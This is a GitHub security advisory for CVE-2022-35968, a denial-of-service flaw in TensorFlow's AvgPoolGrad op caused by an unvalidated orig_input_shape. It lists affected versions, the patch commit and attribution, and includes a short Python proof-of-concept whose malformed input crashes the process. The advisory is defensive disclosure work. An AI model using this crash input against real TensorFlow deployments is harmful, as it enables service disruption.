GitHub Advisoryadvisory · PyPI
GHSA-2475-53vw-vp25 TensorFlow vulnerable to `CHECK` fail in `AvgPoolGrad`
MEDIUM
Official page ↗
- Aliases
- CVE-2022-35968
- Ecosystem
- PyPI
- Packages
- tensorflow, tensorflow-cpu, tensorflow-gpu
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
- Weaknesses
- CWE-617
- Reviewed
- 2022-09-16
Affected packages
• PyPI tensorflow: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-cpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-cpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-cpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-gpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-gpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-gpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
Description
Impact
The implementation of `AvgPoolGrad` does not fully validate the input `orig_input_shape`. This results in a `CHECK` failure which can be used to trigger a denial of service attack:
```python
import tensorflow as tf
ksize = [1, 2, 2, 1]
strides = [1, 2, 2, 1]
padding = "VALID"
data_format = "NHWC"
orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32)
grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64)
tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
```
Patches
We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
Related
Alias · CVE (1)
- CVE-2022-35968 TensorFlow is an open source platform for machine learning. vulnerability
Weakness · CWE (1)
- CWE-617 Reachable Assertion weakness
References
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2475-53vw-vp25 web
- https://nvd.nist.gov/vuln/detail/CVE-2022-35968 advisory
- https://github.com/tensorflow/tensorflow/commit/3a6ac52664c6c095aa2b114e742b0aa17fdce78f web
- https://github.com/tensorflow/tensorflow package
- https://github.com/tensorflow/tensorflow/releases/tag/v2.10.0 web